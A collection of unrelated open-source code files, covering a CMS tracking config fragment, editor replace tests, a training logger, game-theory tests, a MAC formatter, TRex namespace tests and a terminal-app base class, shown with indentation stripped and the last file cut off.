KF_chisquaredBinEdges = cms.vdouble(0, 0.5, 1, 2, 3, 5, 7, 10, 20, 40, 100, 200, 500, 1000, 3000 ), # Additional bin for >3000
KF_bendchisquaredBinEdges = cms.vdouble(0, 0.5, 1, 2, 3, 5, 10, 50 ), # Additional bin for >50
#====== Other track fitter Digi params.
# Currently equal to those for KF, although you can skip track digitisation for them with the following.
Other_skipTrackDigi = cms.bool( True )
),
#===== Use HYBRID TRACKING (Tracklet pattern reco + TMTT KF -- requires tracklet C++ too) =====
Hybrid = cms.bool( False),
#===== Debug plot options
# When making helix parameter resolution plots, only use particles from the physics event (True)
# or also use particles from pileup (False) ?
ResPlotOpt = cms.bool (True)
)
|
py_cui/dialogs/__init__.py
|
ne-msft/py_cui
| 654 |
79311
|
"""A collection of modules containing dialog-style widgets and popups.
"""
import py_cui.dialogs.form
import py_cui.dialogs.filedialog
|
tests/features/replace_test.py
|
nacleric/babi
| 223 |
79327
|
from __future__ import annotations
import pytest
from testing.runner import and_exit
@pytest.mark.parametrize('key', ('^C', 'Enter'))
def test_replace_cancel(run, key):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press(key)
h.await_text('cancelled')
def test_replace_invalid_regex(run):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(')
h.await_text("invalid regex: '('")
def test_replace_invalid_replacement(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_0')
h.await_text('replace with:')
h.press_and_enter('\\')
h.await_text('invalid replacement string')
def test_replace_cancel_at_replace_string(run):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('hello')
h.await_text('replace with:')
h.press('^C')
h.await_text('cancelled')
@pytest.mark.parametrize('key', ('y', 'Y'))
def test_replace_actual_contents(run, ten_lines, key):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_0')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press(key)
h.await_text_missing('line_0')
h.await_text('ohai')
h.await_text(' *')
h.await_text('replaced 1 occurrence')
def test_replace_sets_x_hint_properly(run, tmpdir):
f = tmpdir.join('f')
contents = '''\
beginning_line
match me!
'''
f.write(contents)
with run(str(f)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('me!')
h.await_text('replace with:')
h.press_and_enter('youuuu')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_cursor_position(x=6, y=3)
h.press('Up')
h.press('Up')
h.await_cursor_position(x=6, y=1)
def test_replace_cancel_at_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_\d')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('^C')
h.await_text('cancelled')
def test_replace_unknown_characters_at_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_\d')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('?')
h.press('^C')
h.await_text('cancelled')
def test_replace_say_no_to_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[135]')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_1')
h.press('n')
h.await_text('line_3')
h.press('y')
h.await_text_missing('line_5')
h.await_text('replaced 2 occurrences')
def test_replace_all(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_(\d)')
h.await_text('replace with:')
h.press_and_enter(r'ohai+\1')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line')
h.await_text('ohai+1')
h.await_text('replaced 10 occurrences')
def test_replace_with_empty_string(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_1')
h.await_text('replace with:')
h.press('Enter')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_1')
def test_replace_search_not_found(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('wat')
# TODO: would be nice to not prompt for a replace string in this case
h.await_text('replace with:')
h.press('Enter')
h.await_text('no matches')
def test_replace_small_window_size(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line')
h.await_text('replace with:')
h.press_and_enter('wat')
h.await_text('replace [yes, no, all]?')
with h.resize(width=8, height=24):
h.await_text('replace…')
h.press('^C')
def test_replace_height_1_highlight(run, tmpdir):
f = tmpdir.join('f')
f.write('x' * 90)
with run(str(f)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('^x+$')
h.await_text('replace with:')
h.press('Enter')
h.await_text('replace [yes, no, all]?')
with h.resize(width=80, height=1):
h.await_text_missing('xxxxx')
h.await_text('xxxxx')
h.press('^C')
def test_replace_line_goes_off_screen(run):
with run() as h, and_exit(h):
h.press(f'{"a" * 20}{"b" * 90}')
h.press('^A')
h.await_text(f'{"a" * 20}{"b" * 59}»')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('b+')
h.await_text('replace with:')
h.press_and_enter('wat')
h.await_text('replace [yes, no, all]?')
h.await_text(f'{"a" * 20}{"b" * 59}»')
h.press('y')
h.await_text(f'{"a" * 20}wat')
h.await_text('replaced 1 occurrence')
def test_replace_undo_undoes_only_one(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line')
h.await_text('replace with:')
h.press_and_enter('wat')
h.press('y')
h.await_text_missing('line_0')
h.press('y')
h.await_text_missing('line_1')
h.press('^C')
h.press('M-u')
h.await_text('line_1')
h.await_text_missing('line_0')
def test_replace_multiple_occurrences_in_line(run):
with run() as h, and_exit(h):
h.press('baaaaabaaaaa')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('a+')
h.await_text('replace with:')
h.press_and_enter('q')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text('bqbq')
def test_replace_after_wrapping(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('Down')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[02]')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_2')
h.press('y')
h.await_text_missing('line_0')
h.await_text('replaced 2 occurrences')
def test_replace_after_cursor_after_wrapping(run):
with run() as h, and_exit(h):
h.press('baaab')
h.press('Left')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('b')
h.await_text('replace with:')
h.press_and_enter('q')
h.await_text('replace [yes, no, all]?')
h.press('n')
h.press('y')
h.await_text('replaced 1 occurrence')
h.await_text('qaaab')
def test_replace_separate_line_after_wrapping(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('Down')
h.press('Down')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[01]')
h.await_text('replace with:')
h.press_and_enter('_')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_0')
h.press('y')
h.await_text_missing('line_1')
def test_replace_with_newline_characters(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(line)_([01])')
h.await_text('replace with:')
h.press_and_enter(r'\1\n\2')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line_0')
h.await_text_missing('line_1')
h.await_text('line\n0\nline\n1\n')
def test_replace_with_multiple_newline_characters(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(li)(ne)_(1)')
h.await_text('replace with:')
h.press_and_enter(r'\1\n\2\n\3\n')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line_1')
h.await_text('li\nne\n1\n\nline_2')
|
logger.py
|
dididixu/ShuffleNetV2-pytorch
| 176 |
79341
|
<reponame>dididixu/ShuffleNetV2-pytorch<filename>logger.py
import csv
import os.path
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import numpy as np
plt.switch_backend('agg')
class CsvLogger:
def __init__(self, filepath='./', filename='results.csv', data=None):
self.log_path = filepath
self.log_name = filename
self.csv_path = os.path.join(self.log_path, self.log_name)
self.fieldsnames = ['epoch', 'val_error1', 'val_error5', 'val_loss', 'train_error1', 'train_error5',
'train_loss']
with open(self.csv_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writeheader()
self.data = {}
for field in self.fieldsnames:
self.data[field] = []
if data is not None:
for d in data:
d_num = {}
for key in d:
d_num[key] = float(d[key]) if key != 'epoch' else int(d[key])
self.write(d_num)
def write(self, data):
for k in self.data:
self.data[k].append(data[k])
with open(self.csv_path, 'a') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writerow(data)
def save_params(self, args, params):
with open(os.path.join(self.log_path, 'params.txt'), 'w') as f:
f.write('{}\n'.format(' '.join(args)))
f.write('{}\n'.format(params))
def write_text(self, text, print_t=True):
with open(os.path.join(self.log_path, 'params.txt'), 'a') as f:
f.write('{}\n'.format(text))
if print_t:
print(text)
def plot_progress_errk(self, claimed_acc=None, title='ShuffleNetv2', k=1):
tr_str = 'train_error{}'.format(k)
val_str = 'val_error{}'.format(k)
plt.figure(figsize=(9, 8), dpi=300)
plt.plot(self.data[tr_str], label='Training error')
plt.plot(self.data[val_str], label='Validation error')
if claimed_acc is not None:
plt.plot((0, len(self.data[tr_str])), (1 - claimed_acc, 1 - claimed_acc), 'k--',
label='Claimed validation error ({:.2f}%)'.format(100. * (1 - claimed_acc)))
plt.plot((0, len(self.data[tr_str])),
(np.min(self.data[val_str]), np.min(self.data[val_str])), 'r--',
label='Best validation error ({:.2f}%)'.format(100. * np.min(self.data[val_str])))
plt.title('Top-{} error for {}'.format(k, title))
plt.xlabel('Epoch')
plt.ylabel('Error')
plt.legend()
plt.xlim(0, len(self.data[tr_str]) + 1)
plt.savefig(os.path.join(self.log_path, 'top{}.png'.format(k)))
def plot_progress_loss(self, title='ShuffleNetv2'):
plt.figure(figsize=(9, 8), dpi=300)
plt.plot(self.data['train_loss'], label='Training')
plt.plot(self.data['val_loss'], label='Validation')
plt.title(title)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.xlim(0, len(self.data['train_loss']) + 1)
plt.savefig(os.path.join(self.log_path, 'loss.png'))
def plot_progress(self, claimed_acc1=None, claimed_acc5=None, title='ShuffleNetv2'):
self.plot_progress_errk(claimed_acc1, title, 1)
self.plot_progress_errk(claimed_acc5, title, 5)
self.plot_progress_loss(title)
plt.close('all')
|
open_spiel/python/algorithms/jpsro_test.py
|
ajain-23/open_spiel
| 3,167 |
79342
|
<filename>open_spiel/python/algorithms/jpsro_test.py
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for open_spiel.python.algorithms.jpsro."""
import itertools
from absl.testing import absltest
from absl.testing import parameterized
from open_spiel.python.algorithms import jpsro
import pyspiel
GAMES = (
"sheriff_2p_gabriele",
)
SWEEP_KWARGS = [
dict( # pylint: disable=g-complex-comprehension
game_name=game,
iterations=iterations,
policy_init=policy_init,
update_players_strategy=update_players_strategy,
target_equilibrium=target_equilibrium,
br_selection=br_selection,
train_meta_solver=train_meta_solver,
eval_meta_solver=eval_meta_solver,
ignore_repeats=ignore_repeats,
) for (
iterations,
game,
policy_init,
update_players_strategy,
target_equilibrium,
br_selection,
train_meta_solver,
eval_meta_solver,
ignore_repeats) in itertools.product(
[2],
GAMES,
jpsro.INIT_POLICIES,
jpsro.UPDATE_PLAYERS_STRATEGY,
jpsro.BRS,
jpsro.BR_SELECTIONS,
jpsro.META_SOLVERS,
["mwcce"],
[True, False])
]
TEST_COUNT_LIMIT = 100
interval = len(SWEEP_KWARGS) // TEST_COUNT_LIMIT
interval = interval if interval % 2 != 0 else interval + 1 # Odd interval.
SWEEP_KWARGS = SWEEP_KWARGS[::interval]
def get_game(game_name):
"""Returns the game."""
if game_name == "kuhn_poker_3p":
game_name = "kuhn_poker"
game_kwargs = {"players": int(3)}
elif game_name == "trade_comm_2p_2i":
game_name = "trade_comm"
game_kwargs = {"num_items": int(2)}
elif game_name == "sheriff_2p_gabriele":
game_name = "sheriff"
game_kwargs = {
"item_penalty": float(1.0),
"item_value": float(5.0),
"max_bribe": int(2),
"max_items": int(10),
"num_rounds": int(2),
"sheriff_penalty": float(1.0),
}
else:
raise ValueError("Unrecognised game: %s" % game_name)
return pyspiel.load_game_as_turn_based(game_name, game_kwargs)
class JPSROTest(parameterized.TestCase, absltest.TestCase):
@parameterized.parameters(*SWEEP_KWARGS)
def test_jpsro_cce(self, **kwargs):
game = get_game(kwargs["game_name"])
jpsro.run_loop(game=game, **kwargs)
if __name__ == "__main__":
absltest.main()
|
ttp/match/mac_eui.py
|
showipintbri/ttp
| 254 |
79349
|
"""
Function to convert MAC address into EUI style format.
Credits to the https://stackoverflow.com/a/29446103 answer on stackoverflow
and NAPALM base helpers module
"""
from re import sub
def mac_eui(data):
mac = str(data)
# remove delimiters and convert to lower case
mac = sub("[.:-]", "", mac).lower()
# mac should only contain letters and numbers; also,
# if the length is now not 12 (eg. 008041aefd7e), pad up to
# 12 with "0" - can happen with some vendors
if mac.isalnum():
if not len(mac) == 12:
mac += "0" * (12 - len(mac))
else:
return data, None
# convert mac in canonical form (eg. 00:80:41:ae:fd:7e)
mac = ":".join([mac[i : i + 2] for i, j in enumerate(mac) if not (i % 2)])
return mac, None
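# --- Illustrative usage sketch (added for clarity; not part of the original module).
# The example inputs below are made up. mac_eui() returns a (value, None) tuple,
# matching the return style of the function above.
if __name__ == "__main__":
    for raw in ("0080.41ae.fd7e", "00-80-41-AE-FD-7E", "008041aefd7e"):
        # each of these prints "00:80:41:ae:fd:7e"
        print(mac_eui(raw)[0])
    # non-alphanumeric input is returned unchanged:
    print(mac_eui("not-a-mac!")[0])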
|
scripts/automation/regression/stateless_tests/stl_ns_test.py
|
timgates42/trex-core
| 956 |
79361
|
#!/usr/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
from trex.common.stats.trex_ns import CNsStats
from trex.common.services.trex_service_icmp import ServiceICMP
import pprint
class STLNS_Test(CStlGeneral_Test):
"""Tests for NS function """
def setUp(self):
CStlGeneral_Test.setUp(self)
if self.is_vdev:
self.skip("We don't know what to expect with vdev.")
if not (self.is_linux_stack and self.is_loopback):
self.skip("We need linux stack and loopback for this tests to work")
print('')
self.stl_trex.reset()
self.stl_trex.set_service_mode()
self.stl_trex.namespace_remove_all()
def tearDown(self):
CStlGeneral_Test.tearDown(self)
self.stl_trex.namespace_remove_all()
self.stl_trex.set_service_mode(enabled = False)
def test_ns_add_remove(self):
c= self.stl_trex
port = CTRexScenario.ports_map['bi'][0][0]
print('Using port %s' % port)
c.namespace_remove_all()
# clear counters
cmds=NSCmds()
cmds.clear_counters()
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port);
# add
cmds=NSCmds()
MAC="00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port);
# get nodes
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
macs=r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 1:
self.fail(' must be exactly one MAC')
if macs[0] != "00:01:02:03:04:05":
self.fail(' macs should include 00:01:02:03:04:05')
cmds=NSCmds()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
ns_stat = CNsStats()
ns_stat.set_meta_values(r[0]['result']['data'], r[1]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
for k, v in cnt.items():
assert v < 1e6, 'Value is too big in counter %s=%s' % (k, v)
        assert cnt['tx_multicast_pkts']>0, 'multicast tx counter is zero'
# remove Node
cmds=NSCmds()
cmds.remove_node(MAC)
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
macs=r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 0:
self.fail(' must be no MACs, we deleted node')
# clear counters
cmds=NSCmds()
cmds.clear_counters()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
ns_stat = CNsStats()
ns_stat.set_meta_values(r[1]['result']['data'], r[2]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
assert len(cnt)==0, 'Counters should be zero'
def test_ping_to_ns(self):
# this test works on specific setup with specific configuration
        if CTRexScenario.setup_name not in ('trex17',):
return
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
cmds=NSCmds()
MAC="00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.3')
r=c.ping_ip(1,'1.1.1.3')
assert len(r)==5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_ping_with_vlan(self):
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
cmds=NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
cmds.set_vlan(MAC, [21], [0x8100])
mac2 = "00:01:02:03:04:06"
cmds.add_node(mac2)
cmds.set_ipv4(mac2,"1.1.1.4","1.1.1.2")
cmds.set_ipv6(mac2,True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.4')
r = c.ping_ip(1,'1.1.1.4')
assert len(r) == 5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_many_ns(self):
def get_mac (prefix,index):
mac="{}:{:02x}:{:02x}".format(prefix,(index>>8)&0xff,(index&0xff))
return (mac)
def get_ipv4 (prefix,index):
ipv4="{}.{:d}.{:d}".format(prefix,(index>>8)&0xff,(index&0xff))
return(ipv4)
def build_network (size):
cmds=NSCmds()
MAC_PREFIX="00:01:02:03"
IPV4_PREFIX="1.1"
IPV4_DG ='1.1.1.2'
for i in range(size):
mac = get_mac (MAC_PREFIX,i+257+1)
ipv4 = get_ipv4 (IPV4_PREFIX,259+i)
cmds.add_node(mac)
cmds.set_ipv4(mac,ipv4,IPV4_DG)
cmds.set_ipv6(mac,True)
return (cmds)
c = self.stl_trex
try:
c.namespace_remove_all()
cmds = build_network (100)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(0, cmds)
r=c.wait_for_async_results(0);
macs=r[0]['result']['nodes']
print(macs)
assert len(macs) == 100, 'number of namespace is not correct '
finally:
c.namespace_remove_all()
#####################
# Shared ns Tests #
#####################
def _create_shared_ns(self, port):
r = self.stl_trex.set_namespace(port, method = "add_shared_ns")
return str(r['result'])
def test_shared_ns_add_remove(self):
c = self.stl_trex
port = CTRexScenario.ports_map['bi'][0][0]
print('Using port %s' % port)
c.namespace_remove_all()
# clear counters
cmds = NSCmds()
cmds.clear_counters()
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port)
# add shared ns
ns_name = self._create_shared_ns(port)
# add veth to ns
cmds = NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_ipv6(MAC, enable = True, shared_ns = True)
cmds.set_vlan(MAC, vlans = [22], tpids = [0x8011])
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port)
# get nodes
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
macs = r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 1:
self.fail(' must be exactly one MAC')
if macs[0] != "00:01:02:03:04:05":
self.fail(' macs should include 00:01:02:03:04:05')
cmds = NSCmds()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
ns_stat = CNsStats()
ns_stat.set_meta_values(r[0]['result']['data'], r[1]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
for k, v in cnt.items():
assert v < 1e6, 'Value is too big in counter %s=%s' % (k, v)
        assert cnt['tx_multicast_pkts']>0, 'multicast tx counter is zero'
# remove Node
cmds = NSCmds()
cmds.remove_node(MAC)
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
macs = r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 0:
self.fail(' must be no MACs, we deleted node')
# clear counters
cmds = NSCmds()
cmds.clear_counters()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
ns_stat = CNsStats()
ns_stat.set_meta_values(r[1]['result']['data'], r[2]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
assert len(cnt) == 0, 'Counters should be zero'
def test_many_shared_ns(self):
def get_mac (prefix, index):
mac = "{}:{:02x}:{:02x}".format(prefix, (index>>8) & 0xff,(index & 0xff))
return mac
def get_ipv4 (prefix, index):
ipv4 = "{}.{:d}.{:d}".format(prefix, (index >> 8) & 0xff,(index & 0xff))
return ipv4
def build_network (size, ns_name):
cmds = NSCmds()
MAC_PREFIX = "00:01:02:03"
IPV4_PREFIX = "1.1"
IPV4_DG = '1.1.1.2'
ipv4_subnet = 24
for i in range(size):
mac = get_mac(MAC_PREFIX,i+257+1)
ipv4 = get_ipv4 (IPV4_PREFIX,259+i)
cmds.add_node(mac, shared_ns = ns_name)
cmds.set_ipv4(mac, ipv4 = ipv4, subnet = ipv4_subnet, shared_ns = True)
cmds.set_ipv6(mac, enable = True, shared_ns = True)
return cmds
try:
c = self.stl_trex
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
cmds = build_network (100, ns_name = ns_name)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(0, cmds)
r = c.wait_for_async_results(0)
macs = r[0]['result']['nodes']
print(macs)
assert len(macs) == 100, 'number of namespace is not correct'
finally:
c.namespace_remove_all()
def test_ping_to_shared_ns(self):
# this test works on specific setup with specific configuration
        if CTRexScenario.setup_name not in ('trex17',):
return
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
c.set_namespace(0, method = 'remove_all')
ns_name = self._create_shared_ns(port = 0)
cmds = NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_dg(shared_ns = ns_name, dg = "1.1.1.2")
cmds.set_ipv6(MAC,enable = True, shared_ns = True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.3')
r = c.ping_ip(1, '1.1.1.3')
assert len(r) == 5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_get_shared_ns_node_info(self):
c = self.stl_trex
MAC = "00:01:02:03:04:05"
try:
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
cmds = NSCmds()
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_ipv6(MAC, enable = True, shared_ns = True)
cmds.set_vlan(MAC, vlans = [22], tpids = [0x8100])
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
res = c.set_namespace(0, method = "get_nodes_info", macs_list = [MAC])
nodes = res['result']['nodes']
assert(len(nodes) == 1)
node_info = nodes[0]
assert(node_info['ether']['src'] == MAC)
assert(node_info['ipv4']['src'] == "1.1.1.3")
assert(node_info['ipv4']['subnet'] == 24)
assert(node_info['ipv6']['enabled'] == True)
assert(node_info['vlan']['tags'] == [22])
assert(node_info['vlan']['tpids'] == [0x8100])
finally:
c.namespace_remove_all()
def test_setting_shared_ns_vlans(self):
c = self.stl_trex
try:
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
MAC = "00:01:02:03:04:05"
c.set_namespace(0, method = "add_node" ,mac = MAC, shared_ns = ns_name)
vlans_list = [[22], [22, 23], [22, 23]]
tpids_list = [[0x8100], [0x8100, 0x8100], [0x8100, 0x8100]]
for vlans, tpids in zip(vlans_list, tpids_list):
cmds = NSCmds()
cmds.set_vlan(MAC, vlans, tpids)
cmds.get_nodes_info([MAC])
c.set_namespace_start(0, cmds)
nodes = c.wait_for_async_results(0)[1]['result']['nodes']
assert(len(nodes) == 1)
node_info = nodes[0]
assert(node_info['vlan']['tags'] == vlans)
assert(node_info['vlan']['tpids'] == tpids)
finally:
c.namespace_remove_all()
|
tests/const.py
|
ppstacy/Kaggler
| 743 |
79373
|
<reponame>ppstacy/Kaggler<gh_stars>100-1000
RANDOM_SEED = 42
TARGET_COL = 'target'
|
nurses_2/app.py
|
salt-die/nurses_2
| 171 |
79377
|
import asyncio
from abc import ABC, abstractmethod
from .colors import BLACK_ON_BLACK
from .io import KeyPressEvent, MouseEvent, PasteEvent, io
from .widgets._root import _Root
RESIZE_POLL_INTERVAL = 0.5 # Seconds between polling for resize events.
RENDER_INTERVAL = 0 # Seconds between screen renders.
class App(ABC):
"""
Base for creating terminal applications.
Parameters
----------
exit_key : KeyPressEvent | None, default: KeyPressEvent.ESCAPE
Quit the app when this key is pressed.
default_char : str, default: " "
Default background character for root widget.
default_color_pair : ColorPair, default: BLACK_ON_BLACK
Default background color pair for root widget.
title : str | None, default: None
Set terminal title (if supported).
"""
def __init__(
self,
*,
exit_key=KeyPressEvent.ESCAPE,
default_char=" ",
default_color_pair=BLACK_ON_BLACK,
title=None
):
self.exit_key = exit_key
self.default_char = default_char
self.default_color_pair = default_color_pair
self.title = title
@abstractmethod
async def on_start(self):
"""
Coroutine scheduled when app is run.
"""
def run(self):
"""
Run the app.
"""
try:
asyncio.run(self._run_async())
except asyncio.CancelledError:
pass
def exit(self):
for task in asyncio.all_tasks():
task.cancel()
async def _run_async(self):
"""
Build environment, create root, and schedule app-specific tasks.
"""
with io() as (env_in, env_out):
self.root = root = _Root(
app=self,
env_out=env_out,
default_char=self.default_char,
default_color_pair=self.default_color_pair,
)
if self.title:
env_out.set_title(self.title)
dispatch_press = root.dispatch_press
dispatch_click = root.dispatch_click
dispatch_paste = root.dispatch_paste
def read_from_input():
"""
Read and process input.
"""
for key in env_in.read_keys():
match key:
case self.exit_key:
return self.exit()
case MouseEvent():
dispatch_click(key)
case KeyPressEvent():
dispatch_press(key)
case PasteEvent():
dispatch_paste(key)
async def poll_size():
"""
Poll terminal size every `RESIZE_POLL_INTERVAL` seconds.
"""
size = env_out.get_size()
resize = root.resize
while True:
await asyncio.sleep(RESIZE_POLL_INTERVAL)
new_size = env_out.get_size()
if size != new_size:
resize(new_size)
size = new_size
async def auto_render():
"""
Render screen every `RENDER_INTERVAL` seconds.
"""
render = root.render
while True:
await asyncio.sleep(RENDER_INTERVAL)
render()
with env_in.raw_mode(), env_in.attach(read_from_input):
await asyncio.gather(
poll_size(),
auto_render(),
self.on_start(),
)
def add_widget(self, widget):
self.root.add_widget(widget)
def add_widgets(self, *widgets):
self.root.add_widgets(*widgets)
@property
def children(self):
return self.root.children
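# --- Minimal subclass sketch (added for illustration; not part of the original
# module). `on_start` is the only abstract hook: widgets are typically added and
# app-specific coroutines awaited there. The widget mentioned below is a placeholder.
class _ExampleApp(App):
    async def on_start(self):
        # e.g. self.add_widget(my_widget)  # `my_widget` is hypothetical
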